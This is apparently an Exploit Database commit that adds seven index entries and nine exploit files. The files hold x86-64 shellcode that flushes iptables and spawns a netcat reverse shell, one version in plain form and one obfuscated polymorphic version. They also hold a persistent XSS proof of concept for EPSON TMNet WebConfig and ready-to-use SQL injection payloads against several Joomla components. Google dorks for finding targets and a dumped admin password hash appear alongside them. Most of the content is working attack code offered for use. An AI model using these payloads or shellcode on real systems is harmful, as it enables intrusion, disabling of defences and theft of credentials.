DB: 2017-03-06

9 new exploits

Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)
Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)
Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)

Joomla! Component com_jumi - (fileid) Blind SQL Injection
Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection
EPSON TMNet WebConfig 1.00 - Cross-Site Scripting
Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection
Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection
Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection
Joomla! Component Content ConstructionKit 1.1 - SQL Injection
Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-03-06 05:01:18 +00:00
parent d3106003d4
commit 4811e36301
10 changed files with 378 additions and 1 deletions

View file

@ -15928,6 +15928,9 @@ id,file,description,date,author,platform,type,port
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -21317,7 +21320,7 @@ id,file,description,date,author,platform,type,port
8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0
8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0
8968,platforms/php/webapps/8968.txt,"Joomla! Component com_jumi - (fileid) Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
8968,platforms/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps,0
8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0
8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0
@ -37416,3 +37419,9 @@ id,file,description,date,author,platform,type,port
41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
41502,platforms/hardware/webapps/41502.txt,"EPSON TMNet WebConfig 1.00 - Cross-Site Scripting",2017-03-03,"Michael Benich",hardware,webapps,0
41504,platforms/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
41505,platforms/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,57 @@
# Exploit Title: Persistent XSS in EPSON TMNet WebConfig Ver. 1.00
# Google Dork: intitle:"EPSON TMNet WebConfig Ver.1.00"
# Date: 3/3/2017
# Exploit Author: Michael Benich
# Vendor Homepage: https://www.epson-biz.com/
# Software Link: https://c4b.epson-biz.com/modules/community/index.php?content_id=50
# Version: 1.00
# CVE: CVE-2017-6443
# Contact: benichmt1@protonmail.com // @benichmt1
#####################################################################################
Summary:
Persistent cross-site scripting (XSS) in the web interface of Epson's TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce arbitary Javascript via manipulation of an unsanitized POST parameter.
Steps to reproduce:
1)Make a POST request using Burp Proxy or other application
------------------------------------------------------------------------------------------
POST /Forms/oadmin_1 HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXX.XXX.XXX.XXX/oadmin.htm
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT
------------------------------------------------------------------------------------------
2) Browsing to the main page will execute your script. This remains persistent for any user who then visits this page.
GET /istatus.htm HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXX.XXX.XXX.XXX/side.htm
Connection: close
Upgrade-Insecure-Requests: 1
------------------------------------------------------------------------------------------
Timeline:
------------------------------------------------------------------------------------------
12/1/2016 - Discovery.
12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.
12/16/2016 - Pinged on Twitter. Recommended to contact through support.
12/22/2016 - Reached on LinkedIn directly to individual listed as Security Engineer and asked to find proper security contact channel. No response, but the connection request was accepted.
3/3/2017 - Disclosure
------------------------------------------------------------------------------------------

View file

@ -0,0 +1,53 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html
global _start
section .text
_start:
push 82
pop rax
cdq
push rdx
push word '-F'
push rsp
pop rbx
push rdx
mov rcx, 'iptables'
push rcx
shl al,1
sub al,cl
mov rcx, '//sbin//'
push rcx
push rsp
pop rdi
push rdx
push rbx
push rdi
push rsp
pop rsi
syscall

View file

@ -0,0 +1,70 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html
global _start
section .text
_start:
xor edx,edx
push '1337'
push rsp
pop rcx
push rdx
mov rax,'/bin//sh'
push rax
push rsp
pop rbx
push rdx
mov rax,'/bin//nc'
push rax
push rsp
pop rdi
push '1'
mov rax,'127.0.0.'
push rax
push rsp
pop rsi
push rdx
push word '-e'
push rsp
pop rax
push rdx ; push null
push rbx ; '/bin//sh'
push rax ; '-e'
push rcx ; '1337'
push rsi ; '127.0.0.1'
push rdi ; '/bin//nc'
push rsp
pop rsi ; address of array of pointers to strings
push 59 ; execve system call
pop rax
syscall

View file

@ -0,0 +1,84 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/03/polynetcatrevshell1434.html
global _start
section .text
_start:
jmp next
sh:
db 0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f
nc:
db 0x63,0x6e,0x2f,0x2f,0x6e,0x69,0x62,0x2f
ip:
db 0x2e,0x30,0x2e,0x30,0x2e,0x37,0x32,0x31
handle:
pop rcx
lodsq
bswap rax
push rax
push rsp
push rcx
ret
next:
xor edx,edx
lea rsi,[rel sh]
push rdx
call handle
pop rbx
push rdx
call handle
pop rdi
push '1'
call handle
pop r12
push '1337'
push rsp
pop rcx
push rdx
push word '-e'
push rsp
pop rax
push rdx ; push null
push rbx ; '/bin//sh'
push rax ; '-e'
push rcx ; '1337'
push r12 ; '127.0.0.1'
push rdi ; '/bin//nc'
push rsp
pop rsi ; address of array of pointers to strings
; some magic to put 3b (59) into RAX
; note that this depends on the push "-e"
; and it's position on the stack
mov rax,[rsp + 48]
shr rax,8
sub rax,0x2a
syscall

18
platforms/php/webapps/41504.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_jux_eventon
# Date: 04.03.2017
# Vendor Homepage: http://joomlaux.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
# Demo: http://demo.joomlaux.com/extensions/eventon/
# Version: 1.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
# 3+union+select+1,@@version,3,4,5,6
# # # # #

18
platforms/php/webapps/41505.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component Monthly Archive v3.6.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_monthlyarchive
# Date: 04.03.2017
# Vendor Homepage: http://web357.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/monthly-archive/
# Demo: http://demo.web357.eu/joomla/en/browse/monthly-archive
# Version: 3.6.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL]
# 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# # # # #

29
platforms/php/webapps/41506.txt Executable file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Joomla! Component AYS Quiz v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_aysquiz
# Date: 04.03.2017
# Vendor Homepage: http://ays-pro.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ays-quiz/
# Demo: http://demo.ays-pro.com/index.php/ays-quiz
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/index.php?option=com_aysquiz&controller=question&id=[SQL]&format=raw
# For example;
# 1'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5-- -&format=raw
# :title<li>whlzd_users
# :id<li>whlzd_users
# :name<li>whlzd_users
# :username<li>whlzd_users
# :email<li>whlzd_users
# :password<li>whlzd_users
# :block<li>whlzd_users
# 1'+/*!50000union*/+select+/*!50000concat*/(username,/*!50000char*/(58),password),2,3,4,5+from+whlzd_users-- -&format=raw
# <input class='ays_radio hide' type='radio' id='ans_admin:$2y$10$T7Cetq0lrME/gyxxS0usx.bh2OldeDOhccAW7Ikf33.KhbmZbEgfa'
# Etc...
# # # # #

20
platforms/php/webapps/41507.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_os_cck
# Date: 04.03.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html
# Demo: http://ordasvit.com/joomla-cck-classic/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133
# 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key'
# Etc..
# # # # #

19
platforms/php/webapps/41508.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_altauserpoints
# Date: 04.03.2017
# Vendor Homepage: https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/credits-a-point-systems/altauserpoints/
# Demo: https://www.nordmograph.com/workshop/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
# # # # #